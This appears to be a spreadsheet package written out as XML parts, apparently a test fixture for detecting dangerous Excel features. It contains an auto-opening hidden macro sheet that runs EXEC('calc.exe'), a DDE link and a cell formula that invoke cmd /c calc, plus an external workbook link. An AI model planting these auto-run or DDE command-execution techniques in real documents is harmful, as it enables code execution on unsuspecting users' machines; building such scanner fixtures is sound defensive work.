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macrosheets/sheet1.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>
  <Override PartName="/xl/drawings/drawing1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawing+xml"/>
  <Override PartName="/xl/drawings/vmlDrawing1.vml" ContentType="application/vnd.openxmlformats-officedocument.vmlDrawing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officedocument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Compatibility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3"/>
    <sheet name="Macro1" sheetId="9" state="hidden" r:id="rIdXlm"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName>
  </definedNames>
  <calcPr iterateCount="100" refMode="A1" iterate="false" iterateDelta="0.001"/>
  <extLst>
    <ext xmlns:loext="http://schemas.libreoffice.org/" uri="{7626C862-2A13-11E5-B345-FEFF819CDC9F}">
      <loext:extCalcPr stringRefSyntax="CalcA1ExcelA1"/>
    </ext>
  </extLst>
</workbook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
<Relationship Id="rIdExt1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink1.xml"/><Relationship Id="rIdExt2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLink" Target="externalLinks/externalLink2.xml"/><Relationship Id="rIdXlm" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/shee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[0]!Module1.Run" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="2" name="Button"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr/>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/externalLinks/_rels/externalLink2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLinkPath" Target="https://files.example.net/prices.xlsx" TargetMode="External"/></Relationships>
</file>

<file path=xl/externalLinks/externalLink1.xml><?xml version="1.0" encoding="utf-8"?>
<externalLink xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <ddeLink ddeService="cmd" ddeTopic=" /c calc">
    <ddeItems>
      <ddeItem name="A0" advise="1"/>
    </ddeItems>
  </ddeLink>
</externalLink>
</file>

<file path=xl/externalLinks/externalLink2.xml><?xml version="1.0" encoding="utf-8"?>
<externalLink xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <externalBook r:id="rId1"/>
</externalLink>
</file>

<file path=xl/macrosheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
  <sheetData>
    <row r="1">
      <c r="A1">
        <f>EXEC("calc.exe")</f>
      </c>
    </row>
    <row r="2">
      <c r="A2">
        <f>HALT()</f>
      </c>
    </row>
  </sheetData>
</xm:macrosheet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?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rIdDr" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing1.xml"/><Relationship Id="rIdVml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1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1.53515625" defaultRowHeight="12.8" zeroHeight="false" outlineLevelRow="0" outlineLevelCol="0"/>
  <sheetData>
    <row r="1" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A1" s="0" t="n">
        <v>2</v>
      </c>
      <c r="B1" s="0" t="n">
        <v>3</v>
      </c>
      <c r="C1" s="0" t="n">
        <f aca="false">SUM(A1:B1)</f>
        <v>5</v>
      </c>
    </row>
    <row r="5">
      <c r="A5">
        <f>cmd|' /c calc'!A0</f>
        <v>0</v>
      </c>
      <c r="B5" t="str">
        <f>"a|b"&amp;'x|y'!A1</f>
        <v>a|b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Dr"/>
  <legacyDrawing r:id="rIdVml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en-US</dc:language>
  <cp:lastModifiedBy/>
  <cp:revision>0</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>